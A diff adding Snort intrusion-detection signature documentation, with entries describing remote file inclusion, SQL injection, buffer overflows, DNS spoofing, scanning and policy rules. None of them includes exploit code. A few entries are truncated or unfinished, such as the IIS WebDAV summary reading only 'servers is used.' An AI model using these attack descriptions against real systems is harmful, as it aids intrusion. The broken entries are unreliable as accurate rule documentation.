+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "index.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "index.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1699.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+1699
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Any HTTP GET request to a port associated with a p2p application may generate a false positive event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2815.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2815
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/111-12.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-12
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a scan is in progress. In this case, indications are that the tool nmap
+is being use to determine the operating system of the target host.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000474.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000474
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "meaning.php" with SQL commands being passed as the "QuaranID" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "QuaranID" parameter in the "meaning.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/3357.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3357
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2908.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2908
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repschema
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000375.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000375
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_avatar.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_avatar.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2090.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2090
+
+--
+Summary:
+servers is used.
+
+--
+Impact:
+System compromise, web site defacement, loss of data, execution of code.
+
+--
+Detailed Information:
+A vulnerability exists in a component used by the Microsoft Internet 
+Information Server 5.0 implementation of WebDAV. A specially crafted 
+overly long URI when processed by the server, triggers a buffer overflow
+in ntdll.dll which results in a system compromise of the targeted host.
+
+The exploit only affects versions of IIS 5.0 running on Microsoft 
+Windows 2000 prior to service pack 3. WebDAV is enabled by default on 
+that platform.
+
+used against a target server.
+
+--
+Affected Systems:
+Microsoft Internet Information Server 5.0 WebDAV on Windows 2000 prior 
+to Service Pack 3.
+
+--
+Attack Scenarios:
+The attacker is using a publicly available exploit script.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch or service pack.
+
+Disable WebDAV services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-09.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0109
+
+Bugtraq:
+http://www.securityfocus.com/bid/7116
+
+Microsoft Corporation:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-007.asp
+http://www.microsoft.com/security/security_bulletins/ms03-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2026.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+2026
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0779
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Bugtraq:
+http://www.securityfocus.com/bid/2763
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
--- /dev/null
+++ b/doc/signatures/1457.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1457
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Blackboard CourseInfo running on  a web server. 
+
+Any valid user is able to modify the contents of the database by
+supplying form values of their choosing to the perl scripts running the
+application.
+
+--
+Affected Systems:
+	Blackboard CourseInfo 4.0 for UNIX and Windws NT
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade the application to the latest non-affected version of the
+software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/868.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+868
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000708.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000708
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SmartSiteCMS" application running on a webserver. Access to the file "comedit.php" using a remote file being passed as the "root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root" parameter in the "comedit.php" script used by the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1659.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1659
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2210.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2210
+
+--
+Summary:
+This event is generated when an attempt is made to access global.cgi on an internal server. This may indicate an attempt to exploit an arbitrary command execution vulnerability in Global 3.55 on NetBSD.
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+Global is a source code tagging system for NetBSD. Versions 3.55 and earlier contain a vulnerability where commands sent to global.cgi are improperly parsed, allowing attackers to execute arbitrary code with the security context of the web server.
+
+--
+Affected Systems:
+Systems running Global 3.55 or lower on NetBSD.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to global.cgi on a vulnerable web server. The web server then attempts to execute the commands included in the URL.
+
+--
+Ease of Attack:
+Simple. Proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses global.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Global 4.01 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/1854
+
+--
--- /dev/null
+++ b/doc/signatures/2046.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2046
+
+--
+Summary:
+The IMAP daemon distributed by Washington University (Wu-imapd) is
+subject to a buffer overflow condition which may result in a denial of service.
+
+--
+Impact:
+Possible code execution and Denial of Service.
+
+--
+Detailed Information:
+If a valid user of an IMAP service using wu-imapd makes a partial
+request of mailbox attributes, a buffer overflow occurs in the daemon
+resulting in the crash of the process.
+
+Execution of arbitrary code may be possible with the privileges of the
+user running imapd.
+
+Exploits are widely available for this vulnerability.
+
+--
+Affected Systems:
+	Washington University wu-imapd 2000.0 c
+	Washington University wu-imapd 2000.0 b
+	Washington University wu-imapd 2000.0 a
+	Washington University wu-imapd 2000.0
+	Washington University wu-imapd 2001.0 a
+	Washington University wu-imapd 2001.0
+
+--
+Attack Scenarios:
+The attacker could use one of the available exploits or when logged in 
+as a valid user, make a partial request for the mailbox attributes.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the affected systems.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/253.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+253
+
+--
+Summary:
+This event is generated when a specific DNS response. In this case, there are no DNS authority records for the queried pointer record and has a DNS time-to-live value of one minute. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This is presumably from an attacker engaged in a race condition to respond to a legitimate DNS query.  An attacker may sniff a DNS query requesting an address record and attempt to respond before an actual DNS server can.  The spoofed response is atypical because it does not include the authoritative DNS servers in the returned record.  A legitimate DNS response will likely return the names of the authoritative DNS servers.  The response associated with this traffic has a DNS time-to-live value of one minute.  It is suspected that the TTL is set to expire quickly to eliminate any evidence of the spoofed response.
+
+--
+Affected Systems:
+Any DNS server not using DNSSEC.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Moderate. The attacker has to be able to sniff DNS queries and generate spoofed responses before the actual DNS server.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+This rule uses very specific DNS flag values that could be modified.  Also, if the DNS TTL value is changed from 1, this rule will not trigger.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/990.txt
@@ -0,0 +1,54 @@
+Can't find affected system versions
+Rule:
+
+--
+Sid:
+990
+
+--
+Summary:
+This event is generated when an attempt is made to access a file with '_vti_inf' in the name.
+
+--
+Impact:
+Information gathering.  This attack can leak the version number and scripting paths of Microsoft FrontPage.
+
+--
+Detailed Information:
+Microsoft FrontPage provides software for web designers to generate and administer web pages.  The file '_vti_inf.html' contains FrontPage configuration information of version number and scripting paths that is normally used by a FrontPage client to communicate with the server.  An attacker can craft a URL to access this file to disclose the version number and scripting paths.
+
+--
+Affected Systems:
+???
+
+--
+Attack Scenarios:
+An attacker can craft a URL to access the '_vti_inf' file to learn the version and scripting paths of FrontPage.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply patches and upgrade to most current version of FrontPage.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1319.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1319
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "real snuff".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "real snuff".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/1160.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1160
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000632.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000632
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "summary.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "summary.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
